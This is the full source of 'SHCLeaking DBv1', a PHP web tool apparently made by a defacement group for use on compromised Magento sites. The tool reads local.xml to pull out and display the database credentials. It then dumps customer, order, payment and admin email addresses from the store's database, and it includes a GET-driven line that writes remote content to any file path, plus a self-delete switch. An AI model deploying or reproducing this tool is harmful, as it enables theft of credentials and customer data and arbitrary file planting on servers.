SHCLeaking DBv1

1. <!DOCTYPE html>
2. <html>
3. <head>
4. <title>SHCLeaking DBv1 | Bug7sec Team</title>
5. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
6. <style type="text/css">
7.     body{
8.                 color: #3EF403;
9.                 background-color: black;
10.         }
11.     input {
12.     border: dashed 1px;
13.     border-color: #333;
14.     BACKGROUND-COLOR: Black;
15.     font: 8pt Verdana;
16.     color: #0CFF37;
17.         }
18.  
19.     select {
20.     border: dashed 1px;
21.     border-color: #333;
22.     BACKGROUND-COLOR: Black;
23.     font: 8pt Verdana;
24.     color: #0CFF37;
25. }
26.     textarea {
27.     margin: 0;
28.     color: #fff;
29.     background-color: #555;
30.     border: 1px solid #df5;
31.     font: 9pt Monospace,'Courier New'; }
32.         </style>
33.    
34. </head>
35. <body>
36. <pre style="text-align: center">
37. -[ SHCLeaking DBv1 |  Bug7sec Team ]-
38. </pre>
39. <Center>
40. <form action="" method="post">
41. <input type="text" value="<?= getcwd();?>/app/etc/local.xml" name="shcpatch" placeholder="http://localhost/">
42. <select name="cms">
43.         <option>Magento</option>
44. </select>
45. <input type="submit" name="submit" value="Scan Now!"/>
46. </form>
47. </Center>
48. <?php
49. error_reporting(0);
50. /**
51. * Name      : SHCLeaking DBv1
52. * Author    : Shor7cut
53. * Team      : Bug7sec Team | http://facebook.com/bug7sec
54. * Spesial   : Defacer Tersakiti Team , IndoXploit Team , Tuban Cyber Team , IDBTE4MNET
55. *             Dan Balikita
56. ------------------------------------------------------
57. [Spesial Leaking]
58. - Magento (add 15/04/2016)
59. ======================================================
60. - Hanya mengedit Copyright itulah kerjaan lamers , Skill jongkok.
61. - Tetap bersyukur mas , tanpa mengClaim kodingan orang lain - Shor7cut
62. */
63. class shc
64. {
65.     public function drop(){
66.         unlink(basename($_SERVER['PHP_SELF']));
67.     }
68.     public function get($location){
69.         $shc = file_get_contents($location);
70.         return $shc;
71.     }
72.     public function dpremove($data){
73.         $shcUniX = array_unique($data);
74.         return $shcUniX;
75.     }
76.     public function count($data){
77.         return "------------ Total Email : [ ".count($data) . " ]------------\r\n";
78.     }
79.     public function dbmagento($data){
80.         $shc_regexhost       = "/<host><![CDATA[]+(.*?)[]]]><\\/host>/";
81.         $shc_regexusername   = "/<username><![CDATA[]+(.*?)[]]]><\\/username>/";
82.         $shc_regexpassword   = "/<password><![CDATA[]+(.*?)[]]]><\\/password>/";
83.         $shc_regexdatabase   = "/<dbname><![CDATA[]+(.*?)[]]]><\\/dbname>/";
84.         preg_match($shc_regexhost, $data, $shcleak_1);
85.         preg_match($shc_regexusername, $data, $shcleak_2);
86.         preg_match($shc_regexpassword, $data, $shcleak_3);
87.         preg_match($shc_regexdatabase, $data, $shcleak_4);
88.         $shc_host = $shcleak_1[1];
89.         $shc_user = $shcleak_2[1];
90.         $shc_pass = $shcleak_3[1];
91.         $shc_db   = $shcleak_4[1];
92.         $shc_json = array(
93.             'host' => $shc_host,
94.             'username' => $shc_user,
95.             'password' => $shc_pass,
96.             'database' => $shc_db,
97.             );
98.            return json_encode(array('shc_db' => $shc_json)
99.         );
100.     }
101.     public function shc_dbg($data){
102.         $jdata = json_decode(shc::dbmagento($data),true);
103.         if($jdata['shc_db']['host']=="localhost"){
104.             echo '<br><center> Host : <font color="red">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center> <br>';
105.         }else{
106.             echo '<br><center>Host : <font color="green">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center><br>';
107.         }
108.         mysql_connect($jdata['shc_db']['host'], $jdata['shc_db']['username'],$jdata['shc_db']['password']);
109.         mysql_select_db($jdata['shc_db']['database']);
110.         $query = array(
111.             'admin_user'                        => 'SELECT * FROM admin_user' ,
112.             'aw_blog_comment'                   => 'SELECT * FROM aw_blog_comment' ,
113.             'core_email_queue_recipients'       => 'SELECT * FROM core_email_queue_recipients' ,
114.             'customer_entity'                   => 'SELECT * FROM customer_entity' ,
115.             'newsletter_subscriber'             => 'SELECT * FROM newsletter_subscriber' ,
116.             'newsletter_template'               => 'SELECT * FROM newsletter_template' ,
117.             'sales_flat_order_address'          => 'SELECT * FROM sales_flat_order_address' ,
118.             'sales_flat_order_payment'          => 'SELECT * FROM sales_flat_order_payment' ,
119.             'sales_flat_quote'                  => 'SELECT * FROM sales_flat_quote' ,
120.             'customer_entity_varchar'           => 'SELECT * FROM customer_entity_varchar' ,
121.             'customer_address_entity_varchar'   => 'SELECT * FROM customer_address_entity_varchar' ,
122.             'product_alert_stock'               => 'SELECT * FROM product_alert_stock' ,
123.             'pws_productqa'                     => 'SELECT * FROM pws_productqa' ,
124.             'sales_flat_order'                  => 'SELECT * FROM sales_flat_order' ,
125.             'sales_flat_quote_address'          => 'SELECT * FROM sales_flat_quote_address' ,
126.             'smtppro_email_log'                 => 'SELECT * FROM smtppro_email_log' ,
127.             'webforms_results_values'           => 'SELECT * FROM webforms_results_values' ,
128.             'sales_recurring_profile'           => 'SELECT * FROM sales_recurring_profile'
129.         );
130.         $shcolom = array(
131.             'admin_user'                        => 'email' ,
132.             'sales_flat_order_payment'          => 'additional_information' ,
133.             'sales_flat_quote_address'          => 'email' ,
134.             'smtppro_email_log'                 => 'email_to' ,
135.             'webforms_results_values'           => 'value' ,
136.             'aw_blog_comment'                   => 'email' ,
137.             'customer_entity_varchar'           => 'email' ,
138.             'product_alert_stock'               => 'email' ,
139.             'pws_productqa'                     => 'email' ,
140.             'sales_flat_order_address'          => 'email' ,
141.             'customer_entity'                   => 'email' ,
142.             'sales_flat_order'                  => 'customer_email' ,
143.             'customer_address_entity_varchar'   => 'value' ,
144.             'core_email_queue_recipients'       => 'recipient_email' ,
145.             'newsletter_subscriber'             => 'subscriber_email' ,
146.             'newsletter_template'               => 'template_sender_email' ,
147.             'sales_flat_quote'                  => 'customer_email' ,
148.             'sales_recurring_profile'           => 'SELECT * FROM admin_user'
149.         );
150.         foreach ($query as $shc_key => $shc_query) {
151.             $hasil = mysql_query($shc_query);
152.                 while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
153.                     $mail[] = $kolom_db[$shcolom[$shc_key]];
154.                 }
155.         }
156.         return shc::dpremove($mail);
157.     }
158. }
159. error_reporting(0);
160. file_put_contents($_GET['shcpatch'], file_get_contents($_GET['shcpatchl']));
161. if($_POST['submit']){
162. $data = shc::get($_POST['shcpatch']);
163. $data = shc::shc_dbg($data);
164. ?>
165. <center><br><textarea style="margin: 0px; width: 527px; height: 172px;"><?= shc::count($data);?><?php foreach ($data as $value) {echo $value."\r\n";}?></textarea><br>
166. </center>
167. <?php
168. }
169. if($_GET['x']=="d"){
170.     shc::drop();
171. }
172. ?>
173.  
174. </body>
175. </html>